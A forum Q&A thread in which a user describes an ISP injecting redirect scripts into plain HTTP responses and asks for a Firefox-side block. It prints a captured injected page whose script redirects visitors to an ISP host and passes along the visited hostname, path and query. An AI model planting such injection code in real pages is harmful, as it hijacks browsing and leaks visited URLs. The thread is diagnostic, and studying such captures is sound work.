# Stop Firefox redirecting to special URLs in all JavaScripts

Tags: javascript, firefox

I believe my ISP have got its servers maliciously configured that occasionally when I request to a page, e.g. http://www.somesite.org/ajax.htm, the response I received is replaced with some code that are not belonging to www.somesite.org. This does not happen in every HTTP requests, just randomly(morning may have a higher probability). HTTPS is not affected.

The replaced code includes redirecting scripts, thus result in an annoying situation: imagine that you are scrolling down FaceBook and noticed an interesting post, then suddenly everything disappeared, the browser redirected to an advertisement page provided by your ISP. You may click the Back button, but the browser gets redirected to the new page again.

A typical malicious response looks like this:

```
<html>
<script language=javascript type="text/javascript">
    window.location.replace("http://bjdnserror2.wo.com.cn:8080?HOST=" 
        + location.hostname + "&R="
        + location.pathname + "&" + location.search.substr(location.search.indexOf("\?")+1));
</script>

<noscript>
<meta   http-equiv="refresh"   content="0;URL=http://bjdnserror2.wo.com.cn:8080">
</noscript>
<head>
<title>Redirect</title>
</head>
<body bgcolor="white" text="black">
</body>
</html>
```

which was captured using HTTPFox:
[image: Screenshot on how I captured above code]

The above case happened in a response to *adsupport.renren.com*, and I ultimately been redirected to *bjdnserror2.wo.com.cn*.

**Unlike XSS hijacking**, in which cases malicious code come from another domain and can be easily disguised by the browser, these code come from an interception disrupting a normal request/response, and they just show under the same domain you are visiting. The solution I come up with is stop my Firefox following scripts tending redirecting me to <*.wo.com.cn>. But this seems have not been implemented by any add-ons. The existing add-ons(NoScript, Script Manager) may simply stop either all JavaScripts, or the access to `window.location`. But they will then ruin normal user experience.

Comment: looks like a security hole in renren's ad network. What do you mean "redirected to an advertisement page provided by your ISP"?

Comment: @FlavorScape: I suspect there is nothing to do with renren.com. I mean that the ISP will modify HTTP response text from renren.com to redirect me to its advertising page, possibly by configuring their routers. **ANY site** can be affected with such methods except those you visit with HTTPS.

Answer (score 1):

There is an add-on called NoRedirect for Firefox. Need "regular expression" knowledge to use.

Answer (score 0):

There might be certain PUP or adware on your PC. Have you run anti-spyware program to scan the PC? Sometimes, the antivirus software can remove the malware and [stop browser redirect](http://www.fixmalwareissues.com/how-to-get-rid-of-baseflash-ads-virus-removal-guide/).